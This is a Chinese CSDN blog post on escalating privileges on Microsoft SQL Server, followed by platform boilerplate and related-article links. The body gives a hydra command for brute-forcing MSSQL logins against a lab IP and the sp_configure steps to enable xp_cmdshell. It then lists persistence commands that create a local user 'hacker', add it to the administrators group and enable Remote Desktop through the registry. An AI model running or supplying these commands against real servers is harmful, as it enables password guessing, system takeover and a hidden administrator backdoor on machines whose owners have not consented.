SQLServer数据库漏洞

最新推荐文章于 2024-04-14 17:54:46 发布
最新推荐文章于 2024-04-14 17:54:46 发布
阅读量958 收藏 1
点赞数
分类专栏: sql 文章标签: 数据库 sql java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785324/article/details/128141779
版权

一、SQLServer数据库提权前提条件:

    1.以管理员身份运行数据库服务

    2.已经获得SQL数据库的sysadmin权限

    3.可以连接数据库

二、通过存储过程进行提权

  hydra工具介绍:

    -L:指定用户名字典

    -P:指定密码字典

    -vV:输出破解到的用户名与密码

    -e:ns ,n空密码;s使用密码

语法: hydra -L user.txt -P pwd.txt -vV -e ns 192.168.239.130 mssql

案例: 暴力破解MSSQL的用户名与密码:

hydra -L ./User_name/username.txt -P ./User_password/密码.txt

 -vV -e ns 192.168.239.130 mssql

MSSQL的存储过程介绍:

    存储过程就是在服务端书写好对应的函数功能并命名,当客户端调用该存储过程时,只需要调用其名称即可。exec 存储过程名称

MSSQL提权的关键是利用xp-cmdshell这个存储过程。默认该存储过程是不能被调用的。

开启xp_cmdshell存储过程:

  exec sp_configure 'show advanced options', 1

  

 

reconfigure

exec sp_configure ‘xp_cmdshell’, 1

  

reconfigure

到此提权完毕!

验证提权结果:

  

 

关闭xp_cmdshell存储过程:

exec sp_configure ‘xp_cmdshell’, 0

reconfigure

exec sp_configure 'show advanced options', 0

reconfigure

利用MSSQL提权后的持续访问:

修改远程登录桌面的设置,实现远程访问数据库服务器。

1)exec xp_cmdshell 'net user hacker 123.com /add'

2)exec xp_cmdshell 'net localgroup administrators  hacker  /add'

  

 

3)打开远程桌面: 

exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

4)使用黑客机连接数据库服务器

  

  

 

  

  

 

xiao飞仔
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
预警即预防:6大常见数据库安全漏洞
12-14
总有大批创意百出的黑客不断捣鼓出超狡猾的新方法染指各类数据。然后,更多不那么聪明的黑客不断重复老旧套路——因为同样老旧的漏洞一直在全球各个企业里涌现。   无论如何,数据泄露总是破坏性的;但更糟的是,要怎么向受影响的用户、投资人和证监会交代呢?一家公司上千万用户的个人数据,总不会自己长脚跑到黑市上躺着被卖吧?于是,在各种监管机构找上门来问一些很难堪的问题之前,我们还是来看看这几个常见的数据库安全漏洞吧。   一、数据库安全重要性上升   只要存储了任何人士的任意个人数据,无论是用户还是公司员工,数据库安全都是重中之重。然而,随着黑市对数据需求的上升,成功数据泄露利润的上涨,数据库安全解决
SQL Server数据库常见漏洞总结和渗透测试,附 sqlserver sa帐户无法连接
爱上卿的博客
01-22 6035
SQL Server渗透测试方法 1.默认端口:1433(Server 数据库服务)、1434(Monitor 数据库监控)、(ms-sql-hidden    2433/tcp) 2.弱口令 Msf或者Scansql扫描器扫描SA用户空/弱口令,弱口令获得之后运用SQLtools或者sql server分析器等进行连接,然后进行上传、查询和执行相关操作。 以SA用户通过SQL Serve...
SQLServer/MsSql注入漏洞步骤、使用方法
weixin_46928280的博客
07-20 4459
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤
[学习记录]内网应急实验——对SQLServer数据库弱口令爆破事件进行日志分析
最新发布
渗透为止的博客
04-14 298
SQLServer遭到弱口令爆破进行日志分析
墨者学院-XWAY科技管理系统V3.0
lianliandad的博客
09-15 3279
妙啊
常见数据库漏洞分析与安全总结
xishanm的博客
10-15 1200
数据库安全总结
通过弱口令爆破 sqlserver数据库
weixin_52194536的博客
08-31 1544
1.攻击机:kail 靶机:Windows 2008。3.靶机和攻击机能ping通。1.使用登录名进行爆破。打开1433端口服务。2.使用字典进行爆破。
口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解
薛定谔的猫
04-12 5494
用户可以通过输入用户名和密码来登录数据库服务器。输入如下命令:exec master.dbo.xp_cmdshell 'ipconfig',再输入go,可以发现ipconfig成功执行,获取目标操作系统的ip信息。开启kali-linux虚拟机,打开命令行窗口运行NMAP,输入命令nmap -v -A -Pn 193.168.1.24,对该IP地址进行扫描。在本机打开命令行,输入mysql -h 193.168.1.38 -u root –p,输入密码admin888,尝试登录mysql服务器。
sqlserver数据库服务器安装操作手册
10-15
SQL Server 数据库服务器安装操作手册 SQL Server 数据库服务器安装操作手册是指在服务器上安装和配置 SQL Server 数据库服务器的详细指南。该手册涵盖了从硬件配置到软件安装、配置和运行的所有方面,旨在帮助用户...
三步堵死 SQL Server注入漏洞
09-11
SQL Server 注入漏洞是一种常见的 Web 应用程序安全漏洞,攻击者可以通过构造恶意的 SQL 语句来获取或修改数据库中的数据,以获取未经授权的访问权限。为防止 SQL Server 注入漏洞,需要遵循严格的安全编程实践,...
SQLserver 数据库危险存储过程删除与恢复方法
12-15
SQL Server数据库管理中,确保系统的安全性至关重要。有时,为了防止恶意攻击或不必要的系统权限滥用,需要删除一些可能带来安全风险的存储过程。本文主要讨论如何删除这些危险的存储过程以及在必要时如何恢复它们...
SQL Server数据库安全漏洞及防范方法.pdf
09-19
SQL Server数据库安全漏洞及防范方法.pdf
iis网站服务器+sqlserver数据库服务器安全
02-01
server数据库服务器安全1友好的错误提示页,不出错误黄页,会暴露信息2输入参数检测,get,post,cookie验证,防注入3页面层不含任何业务逻辑4fck等编辑器有安全漏洞,慎用5.net开发除了在页面层对所有输入要防注入外...
Microsoft SQL Server 缓冲区错误漏洞(CVE-2018-8273)解决方法
y995zq的博客
11-01 595
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273。点击链接后进入到该页面,下拉到最下方,安全更新位置。(之前找上面是没有对应的内容的,打开页面都是404)在一次漏洞扫描中,扫描出紧急漏洞。点击箭头链接到该页面,下拉找到下载程序包的位置。再次点击点头位置,就可以看到下载补丁内容了。根据漏洞修复建议去下载补丁。根据修复建议找补丁。
谷歌云 SQL Service 中存在严重漏洞,导致敏感数据遭暴露
smellycat000的专栏
05-30 509
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士谷歌最近修复了一个严重的 Cloud SQL 数据库服务漏洞,它可被用于访问敏感数据并攻陷其它云服务。5月25日,Dig 安全公司的研究员在 GCP 的 CloudSQL 服务中发现了该漏洞,它可导致攻击者越权访问多种数据库引擎如 MySQL、PostgreSQLSQL Server。漏洞简述研究人员提到,“利用该漏洞可使攻击者提权并将用户分配...
常见漏洞类型汇总
qq_44005305的博客
06-17 429
SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取、更改、删除,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。(1)表单提交,主要是POST请求,也包括GET请求;(2)URL参数提交,主要为GET请求参数;(3)Cookie参数提交;
SQL注入漏洞
来日可期的博客
08-24 2150
SQL注入(SQL Injectian)是一种常见的Web安全漏洞。攻击者利用这个漏洞,可以增删改查数据库中数据,或者利用潜在的数据库漏洞进行攻击。
MySQL数据库渗透及漏洞利用总结
05-09 4152
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
SqlServer危险存储过程
weixin_47620767的博客
12-22 1028
SqlServer危险存储过程
如何保证sqlserver数据库安全
03-28
以下是保障SQL Server数据库安全的一些方法: 1. 强密码:设置强密码并定期更改,包括大小写字母、数字和特殊字符。 2. 安全设置:确保SQL Server的安全设置符合最佳实践,如禁用默认帐户、限制管理员访问权限等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值